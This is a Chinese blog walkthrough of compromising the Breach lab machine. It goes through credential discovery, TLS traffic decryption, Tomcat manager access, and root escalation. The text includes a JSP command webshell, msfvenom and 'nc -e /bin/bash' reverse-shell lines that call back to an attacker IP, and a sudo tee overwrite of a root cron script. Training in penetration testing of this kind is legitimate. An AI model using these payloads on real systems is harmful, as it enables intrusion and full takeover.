靶机渗透之突破fbi

学习目的

技术小贴
技术小贴
  • 信息收集
  • 漏洞挖掘
  • impress cms
  • 流量分析
  • 突破Tomcat后台
  • Getshell
  • 权限提升
  • 持久控制

环境配置

下载链接:https://pan.baidu.com/s/1hN7dxPKkkrqhg9Q6I-s9yg

网络配置:使用默认的桥接模式即可!

主机发现

 ➜  ~ netdiscover -i eth1 -r 192.168.1.0/24
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.110.140 00:0c:29:e4:06:dd     24    1440  VMware, Inc.
 ➜  ~ ping 192.168.110.140
PING 192.168.110.140 (192.168.110.140) 56(84) bytes of data.

发现目标机器的IP地址为:192.168.110.140

ping不通的原因是两者不在同一个网段,我们在物理机上修改网卡的配置信息,如下:

1)将自动获取IP地址改为手动设置,设置为当前能上网的网段即可!

靶机渗透之突破fbi

2)添加一个网段,如下:192.168.110.233

靶机渗透之突破fbi

接下来修改Kali的ip地址,如192.168.110.222:

auto eth1
iface eth1 init static
address 192.168.110.222
netmask 255.255.255.255
gateway 192.168.110.1

端口扫描

nmap -v -A 192.168.110.140 -oN /tmp/fbi.txt

靶机渗透之突破fbi

从端口扫描结果可以看出,靶机应该开启了蜜罐代理,因为靶机几乎所有的端口都打开了,端口扫描失败!

蜜罐代理为一种防御手段,通过代理程序,模拟主机的端口服务状态,可以有效迷惑攻击者,从而收集到大量的攻击脚印,常常用来制作字典!

访问测试

访问http://192.168.110.140/,出现网站首页,说明Apache等Web服务真实开启!

靶机渗透之突破fbi

线索大意:

Initech遭到破坏,董事会投票决定聘请其内部的Initech Cyber​​ Consulting,LLP部门协助。鉴于违规的高调性和几乎灾难性的损失,后来有许多针对该公司的企图。Initech已经委任他们的TOP顾问,由Bill Lumbergh,CISSP和Peter Gibbons,C | EH,SEC +,NET +,A +领导,以控制和执行违规行为的分析。
该公司很少意识到这种违规行为不是熟练的黑客的工作,而是一个心怀不满的前雇员在离职时的离别礼物。TOP顾问一直在努力工作,包含违规行为。然而,他们自己的职业道德和留下的烂摊子可能是公司的垮台。

查看源码:

靶机渗透之突破fbi

发现一段奇奇怪怪的字符串,双重base64解密得到以下可疑字符串!

pgibbons:damnitfeel$goodtobeagang$ta
  • base64的特征:只有数字字母,长度随意
  • md5:只有数字字母,只有16个字节,128位

目录爆破

Buster扫描:

200 OK-----http://192.168.110.140///index.html
#扫描结果最少,而且分类不明确

gobuster扫描:

➜  gobuster dir -u http://192.168.110.140 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .php
/images (Status: 301)
/server-status (Status: 403)
#未获取到更多信息

御剑扫描:

靶机渗透之突破fbi

Dirbuste扫描:

Dir found: /impresscms/modules/content/admin/ - 200
File found: /impresscms/footer.php - 200
File found: /impresscms/modules/content/admin/index.php - 302
File found: /impresscms/modules/profile/admin/menu.php - 500
File found: /impresscms/modules/content/admin/about.php - 302
File found: /impresscms/modules/system/language/english/admin/comments.php - 200
File found: /impresscms/modules/system/admin/pages/class/pages.php - 500
File found: /impresscms/modules/system/language/english/admin/pages.php - 200
File found: /impresscms/modules/profile/admin/audio.php - 302
Dir found: /impresscms/images/flags/ - 200
File found: /impresscms/modules/content/admin/content.php - 302
File found: /impresscms/modules/profile/language/english/admin.php - 200
File found: /impresscms/modules/system/language/english/admin/users.php - 200
Dir found: /impresscms/plugins/ - 200
File found: /impresscms/modules/system/language/english/admin/version.php - 200
File found: /impresscms/modules/profile/admin/videos.php - 302
File found: /impresscms/modules/profile/admin/pictures.php - 302
File found: /impresscms/modules/content/admin/menu.php - 500

靶机渗透之突破fbi

查看后台

访问http://192.168.110.140/impresscms/

靶机渗透之突破fbi

后台登陆

使用刚才发现的可疑字符串登陆试试?

pgibbons:damnitfeel$goodtobeagang$ta

靶机渗透之突破fbi

bingo,成功登录!

靶机渗透之突破fbi

搜索漏洞

➜  fbi searchsploit impress cms
ImpressCMS 1.2.x - 'quicksearch_ContentContent' HTML Injectio | exploits/php/webapps/35134.txt
ImpressCMS 1.3.11 - 'bid' SQL Injection                       | exploits/php/webapps/46239.txt
ImpressCMS 1.3.5 - Multiple Vulnerabilities                   | exploits/php/webapps/31431.txt
ImpressCMS 1.3.9 - SQL Injection                              | exploits/php/webapps/39737.txt
ImpressPages CMS 1.0x - 'admin.php' Multiple SQL Injections   | exploits/php/webapps/34053.txt
ImpressPages CMS 3.6 - 'manage()' Remote Code Execution       | exploits/php/webapps/29331.txt
ImpressPages CMS 3.6 - Arbitrary File Deletion                | exploits/php/webapps/29328.txt
ImpressPages CMS 3.6 - Multiple Cross-Site Scripting / SQL In | exploits/php/webapps/29318.txt
ImpressPages CMS 3.8 - Persistent Cross-Site Scripting        | exploits/php/webapps/29790.txt
-------------------------------------------------------------- --------------------------------------
➜  webapps cd /usr/share/exploitdb/exploits/php/webapps/

接下来,我们通过漏扫工具,确定一下ImpressCMS的版本,然后进行相应的利用,暂无发现可利用的POC。

漏洞扫描

Nikto

➜  fbi nikto -h http://192.168.110.140/impress -o ./fbi_nikto.html
#无有效信息

Awvs

高危路径:

http://192.168.110.140/impresscms/modules/   #存在目录遍历
http://192.168.110.140/impresscms/modules/content/ #重定向到一个gif动图,仿佛是嘲讽...

靶机渗透之突破fbi

估计http://192.168.110.140/impresscms/modules/content/是一个关键目录,但是我们进不去额,把这张图片下下来看看!

使用16进制编辑器一番查看,无有用信息,放弃…

后台审计

关键目录发现

柳暗花明又一村,进到impress后台后,发现了进入content目录的入口,如下:

靶机渗透之突破fbi

点击进入,发现tomcat密码:tomacat

靶机渗透之突破fbi

同时,下载pcap包文件:

靶机渗透之突破fbi

关键邮件发现

Inbox里发现三封邮件,看看先:

靶机渗透之突破fbi

邮件内容:

Peter, yeahhh, I'm going to have to go ahead and ask you to have your team only post any sensitive artifacts to the admin portal. My password is extremely secure. If you could go ahead and tell them all that'd be great. -Bill 

Hey Peter,
I got a really good deal on an IDS/IPS system from a vendor I met at that happy hour at Chotchkie's last week!
-Michael

FWD: Thank you for your purchase of Super Secret Cert Pro!
Peter, I am not sure what this is. I saved the file here: 192.168.110.140/.keystore Bob ------------------------------------------------------------------------------------------------------------------------------------------- From: registrar@penetrode.com Sent: 02 June 2016 16:16 To: bob@initech.com; admin@breach.local Subject: Thank you for your purchase of Super Secret Cert Pro! Please find attached your new SSL certificate. Do not share this with anyone!

访问第三封邮件中提示的192.168.110.140/.keystore

发现是一个密钥文件

靶机渗透之突破fbi

➜  fbi file keystore
keystore: Java KeyStore

解密keystore

背景知识

Keytool 是一个Java 数据证书的管理工具 ,Keytool 将密钥(key)和证书(certificates)存在一个称为keystore的文件中。

在keystore里,包含两种数据:

  • 密钥实体(Key entity)、密钥(secret key)又或者是私钥和配对公钥(采用非对称加密)
  • 可信任的证书实体(trusted certificate entries),只包含公钥

生成keystore:

keytool -genkeypair -keysize 1024 -validity 3650 -alias "privateKey" -keystore "privateKeys.keystore" -storepass "public_password1234" -keypass "private_password1234" -dname "CN=localhost, OU=localhost, O=localhost, L=SH, ST=SH, C=CN"
  • alias 产生别名 每个keystore都关联这一个独一无二的alias

修改密码

keytool -storepasswd -keystore d:/xxx.keystore -storepass 123456 -new 新密码

导出证书:

keytool -exportcert -alias "privateKey" -keystore ./xxx.keystore -storepass 123456 -file "xxx.cer"
keytool -printcert -file ./xxx.cer #查看导出证书的信息

导入证书:

keytool -import -alias "publicCert" -file "certfile.cer" -keystore "publicCerts.keystore" -storepass "public_password1234"

常用参数:

-certreq            生成证书请求
-changealias        更改条目的别名
-delete             删除条目
-exportcert         导出证书
-genkeypair         生成密钥对
-genseckey          生成密钥
-gencert            根据证书请求生成证书
-importcert         导入证书或证书链
-importpass         导入口令
-importkeystore     从其他密钥库导入一个或所有条目
-keypasswd          更改条目的密钥口令
-list               列出密钥库中的条目
-printcert          打印证书内容
-printcertreq       打印证书请求的内容
-printcrl           打印 CRL 文件的内容
-storepasswd        更改密钥库的存储口令

证书信息

➜  fbi keytool -list -keystore ./keystore -storepass tomcat
输入密钥库口令:tomcat
密钥库类型: JKS
密钥库提供方: SUN

您的密钥库包含 1 个条目

tomcat, 2016年5月21日, PrivateKeyEntry,
证书指纹 (SHA-256): F0:4A:E8:7F:52:C1:78:B4:14:2B:4D:D9:1A:34:31:F7:19:0A:29:F6:0C:85:00:0B:58:3A:37:20:6C:7E:E6:31

导入证书

➜  work keytool -importkeystore -srckeystore ./keystore -destkeystore ./keystore.pem -deststoretype PKCS12 -srcalias tomcat
正在将密钥库 ./keystore 导入到 ./keystore.pem...
输入目标密钥库口令:
再次输入新口令:
输入源密钥库口令:
➜  work ls
content.gif  keystore  keystore.pem  _SSL_test_phase1.pcap

流量分析

使用Wireshark导入刚才的证书,并进行流量分析!

证书改名

将刚才导入证书的keystore修改改后缀名.p12

导入证书

导入流量包:

将_SSL_test_phase1.pcap直接拖进WireShark,发现没有HTTP包,并且发现工作端口是8443,下面导入证书并配置!

将证书导入到wireshark:

编辑>首选项>协议>TLS

靶机渗透之突破fbi

关键信息

过滤TLS流数据包,得到以下关键信息!

username="tomcat" password="s3cret"
https://192.168.110.140:8443/_M@nag3Me/html
Authorization: Basic dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC 
uid=104(tomcat6) gid=112(tomcat6) groups=112(tomcat6)
#dG9tY2F0OlR0XDVEOEYoIyEqdT1HKTRtN3pC为base编码,解码得到以下信息
## 账号和密码: tomcat:Tt5D8F(#!*u=G)4m7zB

登录后台

https://192.168.110.140:8443/_M@nag3Me/html
账号和密码: tomcat:Tt5D8F(#!*u=G)4m7zB

靶机渗透之突破fbi

Getshell

上传菜刀马

编辑caidao.jsp:

<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>

将caidao.jsp压缩为caidao.zip,然后修改后缀名为.war

部署war文件,上传菜刀马:

靶机渗透之突破fbi

菜刀连接:

msfnevom反弹shell

➜  ~ msfvenom -p java/jsp_shell_reverse_tcp lhost=192.168.222.134 lport=4444 -f raw > shell.jsp
Payload size: 1501 bytes

nc反弹shell:

  • nc -lp 4444

获取交互式shell:

  • python -c “import pty;pty.spawn(‘/bin/bash’)”

靶机渗透之突破fbi

提权

思路

1. 搜索内核漏洞
2. 寻找可利用的用户
   - uid > 1000的自创建用户,其它的是系统或程序用户
3. 从数据库入手
   - 找数据库的连接文件
   - 一般存放在网站目录
4. 看用户目录
5. 看计划任务
6. 看命令历史

搜索内核漏洞

tomcat6@Breach:/var/lib/tomcat6$ uname -r
uname -r
4.2.0-27-generic
4.2.0-27-generic,不存在Ubuntu本地提权漏洞。
存在本地提权漏洞内核版本是:Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04)

查看用户

tomcat6@Breach:/var/lib/tomcat6$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
milton:x:1000:1000:Milton_Waddams,,,:/home/milton:/bin/bash
blumbergh:x:1001:1001:Bill Lumbergh,,,:/home/blumbergh:/bin/bash

数据库信息

tomcat6@Breach:/var/lib/tomcat6$ cd /var/www
cd /var/www
tomcat6@Breach:/var/www$ ls
ls
5446  html
tomcat6@Breach:/var/www$ cd 5446
cd 5446
tomcat6@Breach:/var/www/5446$ ls
ls
0d93f85c5061c44cdffeb8381b2772fd.php  fe4db1f7bc038d60776dcb66ab3404d5.php
cache                                 modules

发现两个奇怪的文件,瞅瞅 >

tomcat6@Breach:/var/www/5446$ cat 0d93f85c5061c44cdffeb8381b2772fd.php
define( 'SDATA_DB_USER', 'root' );
define( 'SDATA_DB_PASS', '' );

发现数据库用户密码:root:null

连接数据库

  • mysql -u root -p
    tomcat6@Breach:/var/www/5446$ mysql -u root -p
    mysql> select user,password from user;
    +------------------+-------------------------------------------+
     | user             | password                                  |
     +------------------+-------------------------------------------+
     | root             |                                           |
     | milton           | 6450d89bd3aff1d893b85d3ad65d2ec2          |
     | root             |                                           |
     | root             |                                           |
     | debian-sys-maint | *A9523939F1B2F3E72A4306C34F225ACF09590878 |
     +------------------+-------------------------------------------+

    解密得到:milton:thelaststraw

提权到milton

tomcat6@Breach:/var/www/5446$ su miltonPassword: thelaststrawmilton@Breach:/var/www/5446$milton@Breach:/var/www/5446$ cdcdmilton@Breach:~$ lslsmy_badge.jpg r  some_script.shmilton@Breach:~$ cat some_script.sh _____ _                   _                   _   _     _               _|_   _| |                 ( )                 | | | |   (_)             | |  | | | |__   ___ _ __ ___|/ ___   _ __   ___ | |_| |__  _ _ __   __ _  | |__   ___ _ __ ___  | | | '_  / _  '__/ _  / __| | '_  / _ | __| '_ | | '_  / _` | | '_  / _  '__/ _   | | | | | |  __/ | |  __/ __  | | | | (_) | |_| | | | | | | | (_| | | | | |  __/ | |  __/  _/ |_| |_|___|_|  ___| |___/ |_| |_|___/ __|_| |_|_|_| |_|__, | |_| |_|___|_|  ___|                                                                  __/ |                                                                 |___/#并没有得到有用的信息

查看计划任务

milton@Breach:~$ crontab -lcrontab -lno crontab for milton

查看命令历史

milton@Breach:~$ historyhistory    1  cd ..    2  ls    3  su milton    4  cd milton    5  cat .bash_history    6  clear    7  su root    8  cat .bash_history    9  ls -lah   10  cat .bash_history   11  su blumbergh   12  sudo nano   13  sudo -i   14  su root   15  sudo nano   16  logoff   17  logout   18  cd /   19  su root   20  logout   21  exit   22  sudo nano   23  visudo   24  clear   25  poweroff   26  su root

从第11行可以看出,我们必须获得blumbergh的权限才能有sudo权限以及后续操作!

图片隐写突破

/var/www/html/images/目录下和milton用户根目录下只有图片可以利用,疑似考察我们图片隐写的能力,二话不说,先下下来!

开启临时服务器

milton@Breach:~$ python -m SimpleHTTPServer 8888
python -m SimpleHTTPServer 8888
Serving HTTP on 0.0.0.0 port 8888 ...
➜  work wget http://192.168.110.140:7777/my_badge.jpg
--2019-08-10 16:16:52--  http://192.168.110.140:7777/my_badge.jpg
正在连接 192.168.110.140:7777... 已连接。
已发出 HTTP 请求,正在等待回应... 400 Bad Request
2019-08-10 16:16:53 错误 400:Bad Request。
#额,连接不上

直接上传大马

靶机渗透之突破fbi

然后,使用大马下载图片!

靶机渗透之突破fbi

exif

➜  work exif my_badge.jpg
‘my_badge.jpg’中的EXIF 信息标识(‘英特尔’字节顺序):
--------------------+----------------------------------------------------------
信息标识                |值
--------------------+----------------------------------------------------------
Software            |Picasa
Artist              |Picasa 2.7
X-Resolution        |72
Y-Resolution        |72
Resolution Unit     |英寸
Compression         |JPEG 压缩
X-Resolution        |72
Y-Resolution        |72
Resolution Unit     |英寸
Exif Version        |Exif版本2.2
Pixel X Dimension   |912
Pixel Y Dimension   |601
FlashPixVersion     |FlashPix版本 1.0
色彩空间                |Internal error (unknown value 65535)
--------------------+----------------------------------------------------------
EXIF 数据中含有缩略图(7072 个字节)。

并不存在可以利用的信息!

strings

➜  work strings *.jpg >> password.txt

靶机渗透之突破fbi

火眼精金:

找到唯一一看得懂的单词:coffeestains,验证确实为blumbergh用户的密码!

密码爆破:

另外,可以把password.txt作为密码字典,直接爆破blumbergh用户的密码:

靶机渗透之突破fbi

靶机渗透之突破fbi

  • 发现存在端口防护,没开22端口,爆破失败

PNG图片查看器:

靶机渗透之突破fbi

  • 发现字符串:text key=”Comment”:”coffeestains
  • 而且密码的来源就是bill.png

靶机渗透之突破fbi

提权到blumbergh

tomcat6@Breach:/var/lib/tomcat6$ su blumbergh
su blumbergh
Password: coffeestains
blumbergh@Breach:/var/lib/tomcat6$ cd
#查看家目录
blumbergh@Breach:~$ ls
blumbergh@Breach:~$
blumbergh@Breach:~$ id
id
uid=1001(blumbergh) gid=1001(blumbergh) groups=1001(blumbergh)
#查看计划任务
blumbergh@Breach:~$ crontab -l
crontab -l
no crontab for blumbergh
#查看命令历史
    blumbergh@Breach:~$ history
    history
    1  clear
    2  logoff
    3  logout
    4  exit
    5  cd /usr/share/cleanup
    6  cat tidyup.sh
    7  ls
    8  cd
    9  ls
    10  pwd
    11  id
    12  histor
    13  his
    14  history

发现历史记录中第五行有一个可以操作,查看之:

查看脚本

blumbergh@Breach:~$ cd /usr/share/cleanup
cd /usr/share/cleanup
blumbergh@Breach:/usr/share/cleanup$ cat tidyup.sh
blumbergh@Breach:/usr/share/cleanup$ cat tidyup.sh
#!/bin/bash
#Hacker Evasion Script 
#Initech Cyber Consulting, LLC
#Peter Gibbons and Michael Bolton - 2016
#This script is set to run every 3 minutes as an additional defense measure against hackers.
cd /var/lib/tomcat6/webapps && find swingline -mindepth 1 -maxdepth 10 | xargs rm -rf

不难发现tidyup.sh是一个定时删除文件的脚本文件!

查看脚本权限:

blumbergh@Breach:/usr/share/cleanup$ ls -l tidyup.sh
ls -l tidyup.sh
-rwxr-xr-x 1 root root 289 Jun 12  2016 tidyup.sh
  • 只有root用户有修改的权限

sudo提权

blumbergh@Breach:/usr/share/cleanup$ sudo -l
Matching Defaults entries for blumbergh on Breach:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User blumbergh may run the following commands on Breach:
    (root) NOPASSWD: /usr/bin/tee /usr/share/cleanup/tidyup.sh

发现用户能够以root权限执行tee程序,故我们可以用来编辑tidyup.sh脚本,写入shell命令,曙光已经出现了,哈哈!

我们知道tee命令用于读取标准输入的数据,并将其内容输出成文件,具体利用方法如下:

blumbergh@Breach:~$ echo "nc -e /bin/bash 192.168.110.233 5555" > shell.txt
blumbergh@Breach:~$ cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
blumbergh@Breach:~$ cat /usr/share/cleanup/tidyup.sh
nc -e /bin/bash 192.168.110.233 5555

或者使用kali生成反弹shell,如下:

➜  msfvenom -p cmd/unix/reverse_netcat localhost=192.168.110.233 lport=5555 R
mkfifo /tmp/bnzpr; nc 192.168.222.134 5555 0</tmp/bnzpr | /bin/sh >/tmp/bnzpr 2>&1; rm /tmp/bnzpr

提权到root

由于tidyup.sh脚本会定时执行,故下次执行的时候就会给攻击机反弹shell,并且是root权限!

root@kali:~# nc -lvp 5555
ls
flair.jpg
id
uid=0(root) gid=0(root) groups=0(root)

总结

  1. 善于发现信息(网站源码,特殊编码,图片隐写,后台URL,漏洞路径等信息)
  2. 通过SSL解密流量,通过流量分析获取账号口令
  3. webshell和反弹命令的使用
  4. 熟悉提权的全部流程

原创文章,作者:小嵘源码,如若转载,请注明出处:https://www.lcpttec.com/fbi/

(0)
上一篇 2019年9月30日 下午4:13
下一篇 2019年9月30日 下午4:20

相关推荐

  • Python

    基础语法 变量 变量存储在内存中的值。这就意味着在创建变量时会在内存中开辟一个空间。 基于变量的数据类型,解释器会分配指定内存,并决定什么数据可以被存储在内存中。 因此,变量可以指定不同的数据类型,这些变量可以存储整数,小数或字符。 变量赋值 #coding=utf-8 #!/usr/bin/python counter = 100 # 赋值整型变量 mil…

    2019年9月30日
    2.2K0
  • 推荐一款网络推广营销拓客的软件

    这次,小编来给大家推荐一款网络推广营销拓客的软件。希望对做网站推广的小伙伴们有所帮助哦。 为各位互联网营销及SEO站长朋友们推荐一款《站长拓客营销神器》,苦苦寻找很久终于给开发出来了,为网络营销从业者朋友解决双手,让获客成本和流量变成更加高效。 什么是“无忧拓客营销” 软件名称:无忧拓客营销工具,名字是我自己起的,帮助网站长们快速挖掘行业流量网站,拓展网站流…

    2019年12月15日
    2.5K0
  • 萌萌哒网络聊天室:Fiora聊天室安装与使用教程

    说明:Fiora是一款偏二次元的Web多人在线聊天应用,使用Node.js、Mongodb、Socket.io和React编写,使用起来还行,挺简洁的,这里水个搭建教程,有兴趣的可以玩玩。 截图 功能 好友,群组,私聊,群聊 文本,图片,代码,url等多种类型消息 贴吧表情,滑稽表情,搜索表情包 桌面通知,声音提醒,语音播报 自定义桌面背景,主题颜色,文本颜…

    2019年11月16日
    2.6K0
  • Shell脚本编程

    简介 Shell 是一个用 C 语言编写的程序,它是用户使用 Linux 的桥梁。Shell 既是一种命令语言,又是一种程序设计语言。 Shell 是指一种应用程序,这个应用程序提供了一个界面,用户通过这个界面访问操作系统内核的服务。 业界所说的 shell 通常都是指 shell 脚本,Shell 脚本(shell script),是一种为 shell 编…

    2019年9月30日
    2.1K0
  • 关于博客站开源程序WordPress网站速度优化指导

    今天,小编来给大家说说 “关于WordPress博客类网站速度优化攻略”。希望对于用wordpress开源程序来建站的小伙伴有所帮助。 使用Wordpress搭建的网站普遍打开速度太慢,针于SEO来讲提升网站打开速度才能获得好的体验。如何提升Wordpress网站打开速度,让WP博客程序实现速度秒开,经过研究实践终于突破了速度这一难题。 要提升Wordpre…

    2019年12月15日
    2.0K0
  • WordPress插件添加二次元机器人伊斯特瓦尔

    这次,小编来给大家介绍一款萌萌的2次元wordpress站点插件。希望大家喜欢,还能帮自己的站点增添点乐趣。 在看到别人博客的时候,不经意地发现在左下角有一个漂亮的美女聊天机器人,叫啥伊斯特瓦尔。觉得很新鲜啊,很想给自己的站点也配置一个。 在网上一扒拉,发现这个美女叫图灵机器人,wordpress安装起来很简单,申请一个apikey,在安装一个插件就可以愉快…

    2020年2月11日
    3.2K1
  • Linux背景知识

    操作系统 体系结构 控制器:CPU,读取系统指令 运算器:CPU,运算 储存器:RAM(内部存储器:易失性存储器) 输入设备:输入数据 输出设备:显示命令执行结果 总线结构 地址总线:负责内存寻址 数据总线:负责传输数据 控制总线:负责控制指令 基本背景 前世 1969年,一群MIT BELL Lib 的家伙用汇编语言开发出一款收费操作系统:MULTICS …

    2019年9月30日
    1.9K0
  • 信息安全实验

    Day1 开班总结 以企业管理的要求约束自己:自律、慎独 做好自己,帮助他人,乐于分享,团队合作 团队 团队4人 课程计划 安装Centos7 远程访问配置 LAMP搭建与Linux+Tomacat+mysql搭建js的环境 通过shell运维网站 部署zabbix实时监控网站及服务器 部署IDS(snort)入侵检测系统 对上述网站进行渗透测试和漏洞修复 …

    2019年9月26日
    2.4K0
  • 推荐好使的在线检测网站工具

    这次,小编来给大家 “推荐好使的在线检测网站工具”。 1. HTML Validatorvalidator.w3.org/网页结构检测工具,支持HTML, XHTML, SMIL, MathML…….2. CSS Validatorjigsaw.w3.org/css-validator/CSS验证。3. Links Validatorvalidator.w3…

    2019年11月16日
    1.2K0
  • 国外VPS购买推荐帖子:RADWEBHOSTING

    国外VPS购买推荐帖子:RADWEBHOSTING,本方法由峰哥博客提供。工具:谷歌浏览器+谷歌浏览器上面的谷歌自动翻译。(谷歌翻译英文嘛,但博主英文好,是不需要翻译英文的,啊哈哈哈哈哈) 活动配置如下; 内存:1024MB Cpu:1 × 2.6GHz + 硬盘:20GB RAID 10 流量:1000GB IP:1个专用IPv4 IPV6:64 IPv6…

    2019年11月30日
    1.2K0
  • 悬剑2.0安装与探究

    镜像下载 https://pan.baidu.com/s/1yfNwtbEC4blwUw9YloVjmA 解压密码:SecQuan.Org 使用PanDownload,在10M的宽带环境下下载逾十个小时,இ௰இ 镜像导入 导入OVF文件快要完成的时候报错:SHA digest of file 悬剑2.0-disk1.vmdk does not match m…

    2019年9月26日
    7.9K0
  • How to Make 图片马

    Copy命令制作 copy 1.png/b+1.php/a 2.png a 表示ascii文件 b 表示二进制文件 Cat命令制作 cat 1.png 1.php > 2.php 用于绕过getimagesize()函数的检查

    2019年9月26日
    1.6K0